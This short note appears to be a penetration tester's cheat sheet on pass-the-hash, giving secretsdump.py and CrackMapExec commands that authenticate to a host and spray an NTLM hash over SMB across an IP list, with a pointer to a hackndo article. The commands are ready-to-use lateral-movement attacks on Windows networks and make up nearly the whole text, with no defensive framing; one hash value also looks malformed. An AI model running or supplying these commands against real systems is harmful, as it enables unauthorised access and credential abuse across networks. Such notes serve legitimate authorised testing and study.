Pass-the-hash

Use the hash of a user to authenticate around the network.

Secretsdump.py

secretsdump.py offsec/Taskscheduler -hashes 4aed682cfe9b5ccf87903c166d11d7afMZWA 10.10.10.10

CrackmapExec

cme smb 10.10.10.10 -u johndo -H 8db8440e2ae574cc606de9d7be466820
cme smb ip-list.txt -u johndo -H 8db8440e2ae574cc606de9d7be466820

En.hackndo.com - Pass-The-Hash